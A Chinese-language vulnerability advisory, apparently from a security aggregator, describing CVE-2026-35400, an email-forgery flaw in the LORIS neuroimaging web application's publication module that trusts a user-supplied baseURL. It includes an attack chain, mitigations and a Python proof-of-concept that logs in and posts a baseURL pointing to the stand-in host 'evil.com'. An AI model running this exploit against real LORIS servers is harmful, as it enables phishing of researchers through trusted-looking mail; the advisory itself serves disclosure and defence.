IPBUF安全漏洞报告
English
CVE-2026-35400 CVSS 3.5 低危

CVE-2026-35400 LORIS邮件伪造漏洞

披露日期: 2026-04-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35400
漏洞类型
邮件伪造
CVSS评分
3.5 低危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
LORIS (Longitudinal Online Research and Imaging System)

相关标签

LORIS邮件伪造输入验证缺失CVSS-3.5

漏洞概述

LORIS是一个用于神经影像学研究的自托管Web应用程序。在20.0.0至27.0.3之前及28.0.1版本中,其publication模块的一个端点存在漏洞。该端点错误地信任用户POST请求提交的baseURL,而非内部LORIS值。拥有publication模块访问权限的攻击者可利用此漏洞伪造发件人为LORIS的邮件,发送至攻击者控制的外部域名。该漏洞已在27.0.3和28.0.1版本中修复。

技术细节

该漏洞源于服务器端对用户输入的`baseURL`参数缺乏严格的验证机制。在LORIS的publication模块中,处理特定POST请求时,应用程序直接使用了用户提交的`baseURL`值,而没有强制使用系统内部配置的URL。这使得拥有低权限且访问publication模块的攻击者能够构造恶意请求,将`baseURL`修改为攻击者控制的外部域名。当系统利用此参数生成并发送通知邮件时,邮件内容中的链接或发件人信息会被篡改,导致邮件伪造。虽然漏洞需要用户交互且机密性未受影响,但破坏了邮件的完整性,可能被用于网络钓鱼攻击。

攻击链分析

STEP 1
1. 侦察与访问
攻击者识别出目标运行LORIS系统,并获取了拥有publication模块访问权限的低权限用户账号。
STEP 2
2. 构造恶意请求
攻击者向publication模块的端点发送POST请求,并在请求体中将`baseURL`参数修改为指向攻击者控制的外部域名。
STEP 3
3. 服务器处理
LORIS服务器接收请求,错误地信任用户提供的`baseURL`,并使用该值生成邮件内容。
STEP 4
4. 邮件伪造与发送
服务器发送伪造的邮件。邮件显示来自LORIS,但包含攻击者控制的链接或信息,诱导受害者点击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_host = "https://example-loris.com" attacker_domain = "https://evil.com" login_url = f"{target_host}/login" vuln_url = f"{target_host}/publication_module/api/endpoint" # User credentials (Low privilege user required) username = "researcher" password = "password" # Establish session session = requests.Session() # 1. Login to get session cookie login_data = {"username": username, "password": password} session.post(login_url, data=login_data) # 2. Send malicious POST request to trigger email forgery # Exploit: Malicious baseURL in POST data payload = { "baseURL": attacker_domain, # The vulnerable parameter "title": "Fake Research Update", "description": "Please check this link." } response = session.post(vuln_url, data=payload) if response.status_code == 200: print("[+] Exploit successful! Email sent with attacker-controlled baseURL.") else: print(f"[-] Exploit failed. Status: {response.status_code}")

影响范围

LORIS 20.0.0 至 27.0.2
LORIS 28.0.0

防御指南

临时缓解措施
建议管理员限制对publication模块的访问权限,仅向必要人员开放。同时,应在WAF或代理层检查API请求中的`baseURL`参数,确保其未被篡改为外部域名。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表